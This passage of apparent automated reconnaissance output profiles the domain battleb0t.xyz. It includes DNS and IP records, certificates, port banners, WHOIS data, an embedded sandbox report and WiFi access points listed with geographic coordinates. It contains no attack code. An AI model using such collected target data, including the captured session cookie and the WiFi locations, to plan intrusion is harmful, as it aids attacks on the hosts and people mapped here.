/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQz9arGHWbnBV0DFzpNHz4YcTiFDQQUWaRmBlKge5WSPKOUByeWdFv5PdACEAcWfhO7yUD4HiZydfoHjso%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.sca1b.amazontrust.com"\n Heuristic match: "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQz9arGHWbnBV0DFzpNHz4YcTiFDQQUWaRmBlKge5WSPKOUByeWdFv5PdACEASVeeR7RvTclo39SniAB8E%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.sca1b.amazontrust.com"\n Heuristic match: "jsv3.recruitics.com"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': No | 34.74.170.74 |
| 2023-05-12 03:09:00 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.95 | 87.248.157.102 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 1 | 0 | 1 | 0 | None | CN=nuke.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:12:10 | Affiliate Description - Abstract | No | DuckDuckGo | 0 | 0 | 5 | 0 | None | Netcraft is an Internet services company based in Bath, Somerset, England. The company provides cybercrime disruption services across a range of industries. | baffin.netcraft.com |
| 2023-05-12 02:54:18 | Linked URL - External | No | Web Spider | 0 | 0 | 3 | 0 | None | https://use.fontawesome.com/9dfc16ed6b.js | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | default (Net ID: 00:01:24:F0:36:D7) | 34.0544, -118.244 |
| 2023-05-12 02:46:30 | Physical Location | No | MetaDefender | 0 | 0 | 3 | 0 | None | North Charleston, United States | 35.229.48.116 |
| 2023-05-12 02:55:20 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://sable.madmimi.com/c/350165?id=104678088.24978.1.0781e25dd519058dcc1e324360776227', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"198.71.248.145:443"\n "35.162.153.72:443"\n "142.250.188.10:443"\n "13.227.74.13:443"\n "52.0.34.104:443"\n "151.139.128.10:443"\n "52.92.176.144:443"\n "104.17.24.14:443"\n "185.199.109.153:443"\n "104.37.183.1:443"\n "142.251.46.163:443"\n "142.250.188.3:443"\n "91.199.212.148:443"\n "142.251.32.46:443"\n "5.101.71.73:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"addtocalendar.com"\n "cdnjs.cloudflare.com"\n "code.jivosite.com"\n "images.dmca.com"\n "sable.madmimi.com"\n "secure.comodo.com"\n "secure.trust-provider.com"\n "www.audiocompliance.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarC3B6.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3576"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_df8_IE_EarlyTabStart_0xab8_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_df8_ConnHashTable<3576>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_df8_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_df8_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_df8_IESQMMUTEX_0_519"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabC3A5.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "CabC3B5.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "bootstrap-side-notes_1_.css" has type "ASCII text with CRLF line terminators"- [targetUID: N/A]\n "Finance__Tax_Payroll_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 1867x719 components 3"- [targetUID: N/A]\n "landingv4_1_.css" has type "assembler source ASCII text with CRLF line terminators"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002452]\n "DMCA_logo-grn-btn120w_1_.png" has type "PNG image data 120 x 43 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "atc-style-glow-orange_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "dark_1_.css" has type "ASCII text with CRLF line terminators"- [targetUID: N/A]\n "S6u9w4BMUTPHh6UVSwiPHw_1_.woff" has type "Web Open Font Format TrueType length 28044 version 1.1"- [targetUID: N/A]\n "1Ptxg8zYS_SKggPN4iEgvnHyvveLxVsEpbCIPrc_1_.woff" has type "Web Open Font Format TrueType length 26196 version 1.1"- [targetUID: N/A]\n "www.google_1_.xml" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "cart-banner2_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 96x96 segment length 16 Exif Standard: [TIFF image data little-endian direntries=4 xresolution=62 yresolution=70 resolutionunit=2] baseline precision 8 480x150 components 3"- [targetUID: N/A]\n "footer-logo_1_.png" has type "PNG image data 250 x 85 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "S6uyw4BMUTPHjx4wWA_1_.woff" has type "Web Open Font Format TrueType length 28648 version 1.1"- [targetUID: N/A]\n "jquery.form_1_.js" has type "ASCII text"- [targetUID: N/A]\n "KFOlCnqEu92Fr1MmEU9fBBc9_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. All Rights Reserved.Roboto MediumRegularVersion 2.137; 2017Roboto-Me"- [targetUID: N/A]\n "elastic_1_.css" has type "ASCII text with CRLF line terminators"- [targetUID: N/A]\n "_6B71C3D0-ADBF-11ED-8536-0800272665FE_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "Dayna_J_1_._Reum" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62) quality = 75" baseline precision 8 200x200 components 3"- [targetUID: N/A]\n "1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvaorCIPrc_1_.woff" has type "Web Open Font Format TrueType length 25916 version 1.1"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"cdnjs.cloudflare.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /c/350165?id=104678088.24978.1.0781e25dd519058dcc1e324360776227 HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: sable.madmimi.com\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.1 302 Found\nContent-Length: 0\nConnection: keep-alive\nStatus: 302 Found\nLocation: https://www.audiocompliance.com/product/ac/form-941-compliance-2022\nDate: Thu, 16 Feb 2023 07:01:48 GMT\nX-Powered-By: Phusion Passenger(R) Enterprise 6.0.17\nServer: nginx + Phusion Passenger(R) 6.0.17"\n "GET /assets/theme/css/bootstrap.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://www.audiocompliance.com/product/ac/form-941-compliance-2022\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.audiocompliance.com\nDNT: 1\nConnection: Keep-Alive\nCookie: ci_session=55c28468f424e1f17699dfeae68cdc12972c9404"\n "GET /product/ac/form-941-compliance-2022 HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: www.audiocompliance.com"\n "GET /assets/theme/css/style.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://www.audiocompliance.com/product/ac/form-941-compliance-2022\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.audiocompliance.com\nDNT: 1\nConnection: Keep-Alive\nCookie: ci_session=55c28468f424e1f17699dfeae68cdc12972c9404"\n "GET /assets/theme/css/swiper.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://www.audiocompliance.com/product/ac/form-941-compliance-2022\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.audiocompliance.com\nDNT: 1\nConnection: Keep-Alive\nCookie: ci_session=55c28468f424e1f17699dfeae68cdc12972c9404"\n "HTTP/1.1 200 OK\nServer: nginx/ | 185.199.109.153 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | re927421 (Net ID: 00:02:8A:40:D2:92) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | DPRWirelessScottsdale (Net ID: 00:02:6F:FD:3F:B2) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:465 | 87.248.157.102 |
| 2023-05-12 02:44:13 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | githubusercontent.com | www.battleb0t.xyz |
| 2023-05-12 02:54:18 | Linked URL - External | No | Web Spider | 0 | 0 | 3 | 0 | None | https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:24:49 | Country | No | Country Name Extractor | 0 | 0 | 5 | 0 | None | Turkey | Domain Name: KEYUBU.NET
Registry Domain ID: 2292564483_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.nicproxy.com
Registrar URL: http://https://nicproxy.com/
Updated Date: 2022-07-15T17:58:49Z
Creation Date: 2018-07-31T21:39:25Z
Registry Expiry Date: 2024-07-31T21:39:25Z
Registrar: Nics Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90 212 213 2963
Domain Status: ok https://icann.org/epp#ok
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: KEYUBU.NET
Registry Domain ID : 2292564483_DOMAIN_NET-VRSN
Registrar WHOIS Server : whois.nicproxy.com
Registrar URL: http://www.nicproxy.com
Updated Date: 2022-07-15T17:58:49Z
Creation Date: 2018-07-31T21:39:25Z
Registrar Registration Expiration Date: 2024-07-31T21:39:25Z
Registrar: NICS Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90.2122132963
Reseller: CIZGI TELEKOMUNIKASYON A.S - NATRO
Domain Status: ok http://www.icann.org/epp#OK
Registry Registrant ID: CID-Redacted for Privacy
Registrant Name: Redacted for Privacy
Registrant Organization: Redacted for Privacy
Registrant Street: Redacted for Privacy
Registrant City: ADANA
Registrant State / Province: Redacted for Privacy
Registrant Postal Code: Redacted for Privacy
Registrant Country: TR
Registrant Phone: Redacted for Privacy
Registrant Phone Ext: Redacted for Privacy
Registrant Fax: Redacted for Privacy
Registrant Fax Ext: Redacted for Privacy
Registrant Email: https://whoisshelter.nicproxy.com/?d=KEYUBU.NET
Registry Admin ID: CID-Redacted for Privacy
Admin Name: Redacted for Privacy
Admin Organization: Redacted for Privacy
Admin Street: Redacted for Privacy
Admin City: Redacted for Privacy
Admin State / Province: Redacted for Privacy
Admin Postal Code: Redacted for Privacy
Admin Country: Redacted for Privacy
Admin Phone: Redacted for Privacy
Admin Phone Ext: Redacted for Privacy
Admin Fax: Redacted for Privacy
Admin Fax Ext: Redacted for Privacy
Admin Email: Redacted for Privacy
Registry Tech ID: CID-Redacted for Privacy
Tech Name: Redacted for Privacy
Tech Organization: Redacted for Privacy
Tech Street: Redacted for Privacy
Tech City: Redacted for Privacy
Tech State / Province: Redacted for Privacy
Tech Postal Code: Redacted for Privacy
Tech Country: Redacted for Privacy
Tech Phone: Redacted for Privacy
Tech Phone Ext: Redacted for Privacy
Tech Fax: Redacted for Privacy
Tech Fax Ext: Redacted for Privacy
Tech Email: Redacted for Privacy
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: Unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>>Last update of WHOIS database: 2023-05-12T02:59:37Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
IMPORTANT: Port43 will provide the ICANN-required minimum data set per
ICANN Temporary Specification, adopted 04 Jun 2018.
Visit whois.nicproxy.com to look up contact data for domains
not covered by GDPR policy.
!****************************************************************************!
NICS Telekomunikasyon A.S., uluslararasi alan adi kayit otoritesi olan ICANN
onayli bir alan adi kayit firmasidir.
Bu alan adina ait web sitesinin icerigi ya da yayinlanmasiyla hicbir sekilde ilgisi yoktur.
Sadece, ICANN kurallari cercevesinde alan adinin kayit edilmesine aracilik yapmaktadir.
Bu alan adi sahibinin kayit sirasinda verdigi bilgiler yukaridaki gibidir.
NICS Telekomunikasyon A.S., bu bilgilerin dogrulugunu garanti edemez.
Daha fazla bilgi almak icin info [at] nicproxy.com adresine yazabilirsiniz.
!*****************************************************************************!
The data in the WHOIS database of NICS Telekomunikasyon A.S. is provided by
Nics Telekomunikasyon Ltd. for information purposes, and to assist persons in
obtaining information about or related to domain name registration
records. NICS Telekomunikasyon A.S. does not guarantee its accuracy.
By submitting a WHOIS query, you agree that you will use this data
only for lawful purposes and that, under no circumstances, you will
use this data to
1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via E-mail(spam) or
2) enable high volume, automated, electronic processes that apply
to Nics Telekomunikasyon Ltd. or its systems.
Nics Telekomunikasyon Ltd. reserves the right to modify these terms.
By submitting this query, you agree to abide by this policy.
NICProxy Whois Server Ver.1.2.2
|
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | E-A (Net ID: 00:14:C1:05:69:7C) | 40.2024, 29.0398 |
| 2023-05-12 03:13:06 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [007.github.io]
https://www.openphish.com/feed.txt | 007.github.io |
| 2023-05-12 03:01:33 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.85): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:00 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 253
Connection: close
CF-RAY: -
| 104.21.6.166 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Badazz-net (Net ID: 00:14:5C:88:1A:C4) | 50.8897, 6.0563 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | referrer-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=WwRFDMWv1i%2FLL8I%2BSQXrEl8P6VG5M1GGitMkpd4FkAGmtOdqQDCLc17nGzjDcmqZpet%2BvxBX8CUcOAv3alTgafYDwFhVZzoAKiiOmj1uFX8dLMhZ1ZA2lQdL%2FA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60363a5a178c-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:44:17 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.111.153 |
| 2023-05-12 03:16:23 | Physical Location | No | ipapi.co | 1 | 0 | 2 | 0 | None | Amsterdam, North Holland, NH, Netherlands, NL | 188.114.96.1 |
| 2023-05-12 02:54:38 | BGP AS Membership | No | Censys | 0 | 0 | 3 | 0 | None | 13335 | 172.67.168.252 |
| 2023-05-12 03:24:29 | Company Name | No | Company Name Extractor | 0 | 0 | 4 | 0 | None | Netlify\, Inc | C=US,ST=California,L=San Francisco,O=Netlify\, Inc,CN=*.netlify.app |
| 2023-05-12 03:01:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.1): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 2WIRE623 (Net ID: 00:00:85:F5:03:9F) | 37.780462,-122.390564 |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 2 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:02:6d:eb:8d:63:78:04:f2:b8:5c:db:39:06:ab:26:ed:a9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 15 23:40:10 2023 GMT
Not After : Jun 13 23:40:09 2023 GMT
Subject: CN=funny.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:75:15:09:c5:81:bb:98:d9:cd:95:bf:a9:c2:90:
49:7e:c9:d9:5b:ca:38:d9:40:de:af:17:a2:51:84:
18:c1:ec:ed:c3:d5:19:f0:4f:41:01:a3:0d:ed:ef:
4f:5a:04:c7:16:79:5d:fa:96:dc:2a:ec:4f:7c:34:
46:4c:ee:fd:f2
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
76:6F:61:1C:BE:F6:0B:43:74:69:9A:F6:F2:62:F9:6E:CA:07:05:76
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny.battleb0t.xyz, DNS:pics.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 16 00:40:11.019 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:3B:02:0B:A2:9E:E2:86:CB:95:75:BB:27:
6B:53:31:16:B5:86:49:63:A8:15:4C:A6:35:A9:06:89:
64:81:81:8A:02:21:00:DB:BF:EF:1B:02:D3:29:C8:31:
95:BB:C8:B6:24:D4:2D:39:FE:3C:BB:87:87:DD:4C:3D:
6E:F8:5C:00:34:71:DB
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Mar 16 00:40:11.009 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:04:85:7D:9E:71:55:A6:C5:38:5A:64:60:
05:9A:15:17:EA:9E:B4:58:0D:3C:86:17:2C:C3:17:21:
8A:21:DE:13:02:21:00:93:46:3A:71:BC:50:F5:73:1A:
31:49:1D:77:D8:F0:F3:D0:7E:06:7D:4A:BA:7A:E8:B4:
4B:2C:3E:84:83:8A:4F
Signature Algorithm: sha256WithRSAEncryption
78:10:ed:28:eb:d8:01:0b:d1:ab:19:2d:17:b5:cd:db:df:f0:
19:bb:c5:bf:e8:be:94:e0:d7:f7:4a:e4:78:eb:00:83:c4:77:
d7:fc:46:d2:7a:d8:2d:ae:b3:9c:1f:b1:2a:97:00:27:56:0d:
be:3b:56:d6:ea:2e:ac:0f:22:29:52:8c:2f:4e:a7:73:9a:8b:
01:f5:2d:ee:f8:6e:63:a3:e0:20:d2:6f:0f:23:ec:f3:e9:f5:
3a:da:07:33:d8:60:c2:43:1f:8b:32:3f:73:0c:e2:d3:be:13:
67:7a:78:16:d5:05:c8:0e:fc:fe:a1:13:73:df:ce:e4:30:4f:
fc:8a:88:a9:4b:94:16:66:3b:1f:a0:96:6e:fd:1e:fa:4a:d4:
c5:37:c1:78:37:3a:c2:f7:2a:52:e1:64:81:83:df:6c:ec:18:
9f:e8:7f:40:ba:dd:8d:ff:ab:1d:65:a2:95:0c:4b:2a:b3:d4:
36:dd:e6:94:5d:2a:ad:ec:e1:d1:0d:fe:4d:1f:eb:87:d5:03:
b5:2f:bd:c9:98:e1:60:20:bf:6e:0c:7a:85:90:e0:96:42:6a:
86:09:c1:bb:ce:bb:d7:7b:a4:b3:1a:c0:15:1c:0d:88:6b:61:
74:d0:93:ed:30:c2:a8:1b:7a:94:f2:58:8e:6d:bd:c5:15:f9:
a0:e1:79:05
| battleb0t.xyz |
| 2023-05-12 02:44:30 | Internet Name | No | DNS Resolver | 1 | 0 | 2 | 0 | None | funny.battleb0t.xyz | [{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020}, {u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': 